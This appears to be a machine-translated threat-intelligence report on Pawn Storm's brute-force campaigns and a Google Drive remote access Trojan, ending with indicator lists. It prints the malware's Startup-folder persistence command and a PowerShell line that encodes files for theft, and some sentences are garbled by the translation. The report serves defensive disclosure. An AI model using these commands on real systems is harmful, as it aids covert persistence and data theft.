pawn storm

THE NON-COMPLEX ATTACK STRATEGY OF THE HACKER GROUP PAWN STORM

In this entry, we share Pawn Storm’s recent activities, focusing on their use of simple methods that are not normally associated with APT groups.

Defenders who find a simple remote access Trojan (RAT) in the network will not immediately think it is from an advanced persistent threat (APT) actor. Similarly, brute force attacks on Internet-facing services (such as email, Microsoft Autodiscover, SMB, LDAP, and SQL) are so common that they look like negligible background noise. But in 2020, the infamous APT actor happened to use these uncomplicated attack methods, so that their attacks might get lost in the noise.

In 2020, spread a simple Google Drive and IMAP remote access Trojan (RAT) to attack its usual targets, such as the Ministry of Foreign Affairs, embassies, defense industry and military departments. RATs are also sent to a wider range of target networks, including various industries around the world. The organization also carried out extensive brute force attacks to steal credentials, such as those of the company’s email account, which we attributed to Pawn Storm’s online investigation and the participant’s abuse of the compromised email account in the malware and sending spear The loose way of phishing emails proves this. Pawn Storm even hard-coded military and government-related email addresses in its IMAP RAT malware to communicate with the victim’s computer. Recently, the Norwegian authorities announced that Pawn Storm had invaded the Norwegian Parliament through brute force attacks.

As shown by incremental improvements, subsequent versions of malware hint at a learning curve for malware authors, which is more typical for less experienced participants than advanced participants. First, RATs are so simple that they don’t even consider international keyboards. This means that it is difficult for an attacker to enumerate the victim’s hard drive with files and folders containing international characters. The error has been quickly corrected, but it shows that this particular operator is relatively inexperienced. Later versions of RAT malware start to use encryption, and encryption can be added from the beginning. The only auxiliary load we observed was a simple keylogger, which stored the stolen information locally on the victim’s machine.

Using only samples, it is difficult to attribute these malware samples to Pawn Storm. Generally, cyber defenders will not attribute this malware to APT participants at all. However, based on the long-term monitoring of activities, we have a reliable attribution to these samples.

Review of recent activities

Damaged accounts from users in the Middle East

Trend Micro has been closely and continuously monitoring the activities of Pawn Storm. We published the latest research on the group in March 2020. In the above research paper, we shared that Pawn Storm severely abused stolen accounts (mainly in the Middle East) to send spear-phishing emails. The abuse of infected email accounts in the Middle East continues in 2020. For example, in early December 2020, the organization used a VPN service to connect to an infected cloud server, and then used the cloud server to connect to a commercial email service provider. The team then logged into an infected e-mail account of a chicken farm in Oman, and then sent credential phishing spam emails to high-profile targets around the world. This shows that Pawn Storm carefully blurred their trajectory on multiple levels.

The abuse of various infected email accounts in the Middle East began in May 2019 and continues to this day. Since August 2020, they no longer use these email addresses to only send spear phishing emails, but instead use them as a way to communicate with compromised systems in the IMAP RAT.

Brute force attack

We believe that Pawn Storm destroys many email accounts through brute force attacks on Internet-facing services such as email, LDAP, Microsoft Autodiscover, SMB and SQL. For example, in May 2020, Pawn Storm scanned the world’s IP addresses on TCP ports 445 and 1433, including those from the European defense industry, possibly to find vulnerable SMB and SQL servers or brute force credentials . In August 2020, Pawn Storm also sent UDP probes from one of its dedicated IP addresses to LDAP servers around the world.

In 2020, Pawn Storm usually attempts to cover up these brute force attempts by routing attack traffic on Tor and VPN servers. However, this is not always enough to hide these activities. In a Microsoft article on the forced use of Office365 credentials through Tor, Microsoft attributed the activity to Strontium, which is another name for Pawn Storm. We wrote an article about the attack in early 2020. These brute force attacks started in 2019, and then we can firmly attribute them to Pawn Storm, because we can cross-correlate the extensive detection of global Microsoft Autodiscover servers with high-confidence indicators. Group’s more traditional attack methods (spear phishing and credential phishing).

To illustrate the simplicity of the malware in Pawn Storm’s recent spear phishing attack, we describe the following example:

Technical analysis of Google Drive RAT

clip_image001

Figure 1. Spear phishing emails from Pawn Storm-collected in August 2020.

Starting in August 2020, Pawn Storm has sent several spear-phishing emails with malicious RAR attachments. In the earliest sample we received, there were two almost identical RAR files, which contained a file called info.exe. Both versions of info.exe files are self-extracting archives (SFX). They extract and execute two files: decrypt.exe and gdrive.exe. We have:

c4a61b581890f575ba0586cf6d7d7d3e0c7603ca40915833d6746326685282b7 installation

  • crypto.exe – 661d4a0d877bac9b813769a85c01bce274a77b29ccbd4b71e5b92df3c425b93b
  • gdrive.exe – cbd9cb7b69f864ce8bae983ececb7cf8627f9c17fdaba74bd39baa5cdf605f79

3fd45b9b33ff5b6363ba0013178572723b0a912deb8235a951aa3f0aa3142509 install

  • crypto.exe – 661d4a0d877bac9b813769a85c01bce274a77b29ccbd4b71e5b92df3c425b93b
  • gdrive.exe – 2060f1e108f5feb5790320c38931e3dc6c7224edf925bf6f1840351578bbf9cc

Decoy file

We noticed that the file crypto.exe is a decoy file, once info.exe is executed, it will run. The application will only display a message box where the user can type the password for decryption. Examining the disassembly of this file, you can find that it will display another message box only after entering the password on the main application.

clip_image002clip_image003

Figure 2-3. The message box displayed by crypto.exe

After closing this application, the SFX archive file will execute the file gdrive.exe. The different versions of gdrive.exe are almost the same, except that the base64-encoded file 2060f1e108f5feb5790320c38931e3dc6c7224edf925bf6f1840351578bbf9cc is added to the victim’s ID.

clip_image004

Figure 4. Drive.exe code snippet showing comp_id

clip_image005

Figure 5. Drive.exe code snippet showing comp_id and base64 encoding

Initial run

The first thing the malware has to do is to copy itself to the startup directory to maintain persistence. It does this through cmd.exe using the following command:

  • move / Y“ {malware_location}”
    “ C:\ Users \ {username} \ AppData \ Roaming \ Microsoft \ Windows \ Start
    Menu \ Programs \ Startup \ gdrive.exe”

Every time the malware uses cmd.exe to run a command, the standard output (STDOUT) of the executed command is piped and written to the Google Drive account in the following file name format:

  • {utcnow} _report_ {victim’s ID}

clip_image006

Figure 6. Code snippet showing the execution of the command

The client key and token used to read and write the attacker’s Google Drive account has been hard-coded on the malware itself.

clip_image007

clip_image008

Figure 7-8. Code snippet showing client secret and token

By sending information through Google Drive, the attacker can check whether the computer executing the malware is the target victim they want to target.

Receive commands and data breaches

The robot checks the files in Google Drive every 20 minutes. If there is a file with the corresponding file name format (cmd_{victim’s ID}), it will download the file and run its content as a batch file.

clip_image009

Figure 9. Code snippet showing waiting command

Similarly, the STDOUT of the command will be written back to Google Drive. Use Google Drive as a command and control (C&C) server, which can act as a reverse shell for an attacker.

The command file received by the robot from Google Drive will also be deleted as soon as it is downloaded.

clip_image010

Figure 10. Code snippet showing readFile

Using the “reverse shell” method mentioned above, an attacker can use the following commands to steal data/documents:

  • powershell-command “[Convert] :: ToBase64String ([IO.File] :: ReadAllBytes (‘{filename}’))

clip_image011

Figure 11. Code snippet showing data leakage

The auxiliary load with the file name Google Drivemonitor.exe (0b94e123f6586967819fa247cdd58779b1120ef93fa1ea1de70dffc898054a09) is a keylogger. The collected keystrokes are stored in the same directory as the executed malware.

clip_image012

Figure 12. Code snippet showing key log

This auxiliary payload does not have any function to upload the collected keystrokes back to the attacker. However, because the main malware acts as a “reverse shell”, the attacker can retrieve the collected keystrokes at a later time.

In the end, the threat actors made improvements to the malware, such as encryption. Later, actors also started to use IMAP RAT.

IOCs

34.243.239[.]199
74.208.228[.]186
193.56.28[.]25
195.191.235[.]155

280c8557eb45d5fee4a4663f5db5dcaf
934dad8c091622cd6fe9907104bc73ab
dae8e4a606dac20b755b1a553acbaf16
b711ade716c30f83d7631ac00bf754dd
f91d037d8686fbee12b984d2a8fd344c
0a0355d5fad8c5437ea79f56db152274
bc2866c331d58d255b4e7e95db928a43
d256798ac5b5b60a31d52b8e8281bc77
96bb5d48c7b991175ac38f8699ed4012
6d8ec301bff06bc347540f286587629e
2b8047743f3c70c8be106bb795ed6e9d
0fd132d93fd85b4668a97295cc6c7737
a5f3883d1f3d0072d316df9411694fb2
980d6d0cca3aad0000083d428d3e791d
74b83a7ff32d0a4926798431bed12ab2
23e7001d1ac560e55f4a260b18a8fec8be40d840
052237ccb7f42c07c861fe5e7c2a7b2c1bba1491
4a08ac71aab4687baa6e3f97bdb770ff791be6e7
59f1151b7370cd5be7489a7d9246469d21f460fe
9477b9158acf9775ae1bd4b2d594c06c6abf8b8c
a5124396ddcb855a4777c0d95645faeeb6d6b2e4
8a101cf72730bbd0f44207055602d95784f73331
2c7559d6f1659712f44b1a034f5e67c590c06f08
929f4d9d05c963211ca11a45c33b26b96f7b6570
3d6c208b796b4a86ffc998393c53c1ea91821421
d489d6bae8319a9c22ad3fb217c05e09f7bc9ae3
7f68deaa89959c6940d2f54b12098f8ea6eb0535
54ede8a3824dfeb42dd18f194e3130778e6c7235
89443c0a78fd0d11c1c43d9ca2e33088ac093a7a
7e0735f1cc9fbfc4c990011ffc91762c969a6d07
c4a61b581890f575ba0586cf6d7d7d3e0c7603ca40915833d6746326685282b7
cbd9cb7b69f864ce8bae983ececb7cf8627f9c17fdaba74bd39baa5cdf605f79
f364729450cb91b2a4c4e378c08e555137028c63480a221bb70e7e179a03f5cc
fe00bd6fba209a347acf296887b10d2574c426fa962b6d4d94c34b384d15f0f1
b61e0f68772f3557024325f3a05e4edb940dbbe380af00f3bdaaaeabda308e72
c8b6291fc7b6339d545cbfa99256e26de26fff5f928fef5157999d121fe46135
50b000a7d61885591ba4ec9df1a0a223dbceb1ac2facafcef3d65c8cbbd64d46
3384a9ef3438bf5ec89f268000cc7c83f15e3cdf746d6a93945add300423f756
abf0c2538b2f9d38c98b422ea149983ca95819aa6ebdac97eae777ea8ba4ca8c
faf8db358e5d3dbe2eb9968d8b19f595f45991d938427124161f5ed45ac958d5
4c1b8d070885e92d61b72dc9424d9b260046f83daf00d93d3121df9ed669a5f9
770206424b8def9f6817991e9a5e88dc5bee0adb54fc7ec470b53c847154c22b
6fb2facdb906fc647ab96135ce2ca7434476fb4f87c097b83fd1dd4e045d4e47
31577308ac62fd29d3159118d1f552b28a56a9c039fef1d3337c9700a3773cbf
661d4a0d877bac9b813769a85c01bce274a77b29ccbd4b71e5b92df3c425b93b